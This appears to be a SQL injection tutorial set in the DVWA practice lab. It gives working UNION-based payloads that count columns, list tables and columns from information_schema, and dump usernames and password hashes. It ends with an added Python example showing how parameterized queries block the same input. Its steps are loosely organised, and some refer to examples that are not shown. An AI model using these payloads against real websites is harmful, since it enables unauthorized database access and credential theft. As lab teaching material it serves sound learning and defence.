Let's bypass the login and database of the website
How to do SQL Injection
In a SQL injection attack, malicious SQL code is inserted into the website's input fields or into the URL in the address bar. By using it, an attacker can get into the website's database and delete, modify or steal its data. There are four types:
- Error-based SQL Injection
- Union-based SQL Injection
- Blind SQL Injection
- Out-of-band SQL Injection
1. Error based
In an error-based attack, the attacker intentionally inserts a query that makes the server show a database error, and then takes advantage of what the error message reveals.
2. Union based
The UNION SQL operator combines the results of two or more SELECT statements into a single result.
3. Blind SQL based
Blind SQL injection is a type of attack in which the attacker sends the database a question-type query whose answer, after execution, is yes or no.
4. Out-of-band (OOB) SQL based
💡 In simple words, command injection is possible where the page executes a command.
- Open the command injection page on DVWA (also available in Mutillidae)
- First, copy and paste the given command to understand what it does.
- A command can be injected on this page because the IP address entered here is pinged and the ping output is displayed,
- and ping is run as a command, so we can inject any workable command here
Tool needed: Burp Suite
- Open Burp Suite and intercept the page
- Now replace the id value as in the example
Now click on the Forward button
- Set the security mode to High
- Now click SQL Injection and then "Click here to change your ID".
Now click on the Submit button
Union Based Attack
In this attack, we will learn how tables, columns and values are extracted from the database.
💡 We are currently testing in low security mode. If you want, you can try the medium and high levels by following the example given above.
Check the total number of columns in the database
Here we intentionally enter column numbers in an ORDER BY clause to find out where the columns stop. In this way we get to know how many columns there are.
- Enter the code cybNg' ORDER BY 1,2,3 # in the input box and submit
- Now you will see an error like Unknown column '3' in 'order clause'
Now click on the Submit button
Now you will see an error. This means that the column list you gave (1,2,3) is probably more or less than the real number of columns, so you have to keep checking with different values.
Now check again with only (1,2)
As soon as you check (1,2), you see no error. This means that there are 2 columns in this table.
Get the table names of the database
cybNg' UNION SELECT table_name,null from information_schema.tables WHERE table_schema=database() #
Here we find two tables, named guestbook and users.
Get the column names of the database
cybNg' UNION SELECT column_name,null from information_schema.columns WHERE table_schema=database() #
Here we find many column names, such as comment_id, comment and name.
Get the column values of the database
cybNg' UNION SELECT user,password from users #
Here we find many column values, including usernames and passwords such as admin and 5f4dcc3b5aa765d61d8327deb882cf99 (an MD5 hash).
💡 You can also use the sqlmap tool for SQL injection.
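Why the UNION input above returns the users table, and how a parameterized query stops it, shown as an added example that is not part of the original page or of DVWA. It assumes an in-memory SQLite database in place of the lab's MySQL, constructed rows, and hypothetical function names; the trailing # of the page's input becomes SQLite's "-- " comment.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the lab database; every row is constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT,
                            user TEXT, password TEXT);
        INSERT INTO users VALUES ('1', 'admin', 'admin', 'admin', 'constructed-hash-1');
        INSERT INTO users VALUES ('2', 'Gordon', 'Brown', 'gordonb', 'constructed-hash-2');
    """)
    return db

def lookup_vulnerable(db, user_id):
    # The input is pasted into the SQL text, so a quote inside it ends the
    # string literal and everything after it is parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_safe(db, user_id):
    # Placeholder binding: the input travels as a value and is never parsed as SQL.
    return db.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()

def is_plain_id(user_id):
    # Allow-list check as a second layer: this field only ever needs digits.
    return user_id.isdigit()

# The page's UNION input, with SQLite's "-- " comment in place of MySQL's "#".
PAYLOAD = "cybNg' UNION SELECT user,password from users -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))  # rows from user/password
    print("safe:      ", lookup_safe(db, PAYLOAD))        # no rows: input is just data
    print("safe id=1: ", lookup_safe(db, "1"))            # normal lookup still works
```

The same binding fix applies to the ORDER BY and information_schema inputs, because none of them can leave the value position of the query.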